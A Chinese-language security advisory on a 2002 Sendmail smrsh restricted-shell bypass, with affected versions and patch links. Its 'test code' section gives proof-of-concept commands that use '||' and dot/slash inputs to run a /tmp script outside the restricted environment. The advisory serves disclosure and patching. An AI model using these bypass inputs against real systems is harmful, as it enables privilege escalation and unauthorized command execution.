Sendmail SMRSH双管道访问冲突漏洞发布时间:2002-10-08 更新时间:2002-10-08 严重程度:高 威胁程度:权限提升 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:5845 受影响系统 Sendmail Consortium Sendmail 8.12 .0详细描述 Sendmail是开放源代码邮件传送代理。可使用在多种UNIX和LINUX操作系统下。 smrsh设计用于防止在受限环境外执行命令,但是,当使用了双管道(||)或者使用点(.)和斜杠(/)字符混合使用的命令输入时,用户可以绕过smrsh检查,导致命令在限制环境之外执行。 测试代码 $ echo "echo unauthorized execute" > /tmp/unauth $ smrsh -c ". || . /tmp/unauth || ." /bin/sh: /etc/smrsh/.: is a directory unauthorized execute 或者执行如下命令: smrsh -c "/ command" smrsh -c "../ command" smrsh -c "./ command" smrsh -c "././ command" 解决方案 补丁下载: Sendmail Consortium Sendmail 8.12 .0: Sendmail Consortium Patch smrsh-20020924.patch http://www.sendmail.org/patches/smrsh-20020924.patch Sendmail Consortium Sendmail 8.12.1: Sendmail Consortium Patch smrsh-20020924.patch http://www.sendmail.org/patches/smrsh-20020924.patch Sendmail Consortium Sendmail 8.12.2: Sendmail Consortium Patch smrsh-20020924.patch http://www.sendmail.org/patches/smrsh-20020924.patch Sendmail Consortium Sendmail 8.12.3: Sendmail Consortium Patch smrsh-20020924.patch http://www.sendmail.org/patches/smrsh-20020924.patch Sendmail Consortium Sendmail 8.12.4: Sendmail Consortium Patch smrsh-20020924.patch http://www.sendmail.org/patches/smrsh-20020924.patch Sendmail Consortium Sendmail 8.12.5: Sendmail Consortium Patch smrsh-20020924.patch http://www.sendmail.org/patches/smrsh-20020924.patch Sendmail Consortium Sendmail 8.12.6: Sendmail Consortium Patch smrsh-20020924.patch http://www.sendmail.org/patches/smrsh-20020924.patch 相关信息 zen-parse <zen-parse@gmx.net>. 参考:http://www.sendmail.org/ |
